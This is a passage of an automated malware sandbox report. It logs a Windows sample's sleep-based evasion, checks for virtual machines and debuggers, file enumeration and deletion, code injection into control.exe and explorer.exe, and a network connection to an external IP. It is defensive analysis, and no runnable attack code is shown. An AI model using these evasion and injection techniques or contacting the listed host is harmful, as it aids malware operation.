            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392Thread sleep time: -1773297476s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392Thread sleep count: 1682 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392Thread sleep count: 2348 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392Thread sleep count: 818 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392Thread sleep time: -157056s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392Thread sleep count: 698 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392Thread sleep time: -268032s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392Thread sleep count: 853 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392Thread sleep time: -81888s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392Thread sleep count: 446 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392Thread sleep count: 2353 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392Thread sleep time: -56472s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5392Thread sleep count: 784 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6440Thread sleep count: 3777 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452Thread sleep count: 161 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep count: 2449 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1348Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6752Thread sleep count: 84 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1348Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4104Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4104Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4972Thread sleep count: 5209 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4964Thread sleep count: 1051 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
            Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pqvogmwc.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ugg3o5nf.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0hsihch1.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sjfy431f.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pwlcj2cu.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oyq1c2cj.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tpt0a0ul.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oeprcmty.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 1682Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 2348Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 818Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 698Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 853Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 446Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 2353Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeWindow / User API: threadDelayed 784Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 386Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 467Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 878Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3777
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2449
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3669
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5209
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1051
            Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 5.7 %
            Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,1_2_046CB190
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046CB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,1_2_046CB2F7
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046DD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,1_2_046DD39D
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_04BCB190
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BCB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_04BCB2F7
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BDD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_04BDD39D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EAB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,4_2_05EAB190
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EBD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,4_2_05EBD39D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EAB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,4_2_05EAB2F7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0511B190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,5_2_0511B190
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0512D39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,5_2_0512D39D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0511B2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,5_2_0511B2F7
            Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046DFD82 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,1_2_046DFD82
            Source: explorer.exe, 0000002F.00000000.488090790.000000000871C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000002F.00000000.496756398.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
            Source: explorer.exe, 0000002F.00000000.504963092.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000002F.00000000.488090790.000000000871C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
            Source: rundll32.exe, 00000005.00000003.356861693.0000000003380000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.495341507.000000000337C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.370066719.0000000003382000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.494533475.000000000337C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.496800604.000000000337F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.359830510.0000000003380000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.498298788.0000000003380000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.358348203.0000000003380000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWntVersion\Internet Settings~~
            Source: explorer.exe, 0000002F.00000000.504963092.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
            Source: loaddll32.exe, 00000001.00000003.492686676.0000000001342000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.508275635.0000000001347000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.370406857.0000000001332000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.493122796.0000000001310000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000002.511408070.0000000001343000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.489086905.000000000133A000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.488421383.0000000001331000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.493342130.0000000001346000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.369970075.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: regsvr32.exe, 00000003.00000003.500987131.0000000003362000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(^8
            Source: explorer.exe, 0000002F.00000000.488090790.000000000871C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046D653E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_046D653E
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0CE8 mov eax, dword ptr fs:[00000030h]1_2_00DC0CE8
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0C57 mov eax, dword ptr fs:[00000030h]1_2_00DC0C57
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0A64 mov eax, dword ptr fs:[00000030h]1_2_00DC0A64
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0BFC mov eax, dword ptr fs:[00000030h]1_2_00DC0BFC
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00DC0B14 mov eax, dword ptr fs:[00000030h]1_2_00DC0B14
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120C57 mov eax, dword ptr fs:[00000030h]4_2_01120C57
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120B14 mov eax, dword ptr fs:[00000030h]4_2_01120B14
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120BFC mov eax, dword ptr fs:[00000030h]4_2_01120BFC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120A64 mov eax, dword ptr fs:[00000030h]4_2_01120A64
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01120CE8 mov eax, dword ptr fs:[00000030h]4_2_01120CE8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0CE8 mov eax, dword ptr fs:[00000030h]5_2_00EB0CE8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0A64 mov eax, dword ptr fs:[00000030h]5_2_00EB0A64
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0C57 mov eax, dword ptr fs:[00000030h]5_2_00EB0C57
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0BFC mov eax, dword ptr fs:[00000030h]5_2_00EB0BFC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00EB0B14 mov eax, dword ptr fs:[00000030h]5_2_00EB0B14
            Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046C8C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,1_2_046C8C50
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04BC8C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,3_2_04BC8C50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_05EA8C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,4_2_05EA8C50
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_05118C50 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,5_2_05118C50

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 194.76.226.200 80Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\System32\loaddll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Writes to foreign memory regions
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 220000Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: CE0000Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF78FDA12E0Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 956000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2D60000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 954000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2B60000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 940000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2B50000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 942000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2AC0000
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 93E000
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 2BA0000
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 93C000
            Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
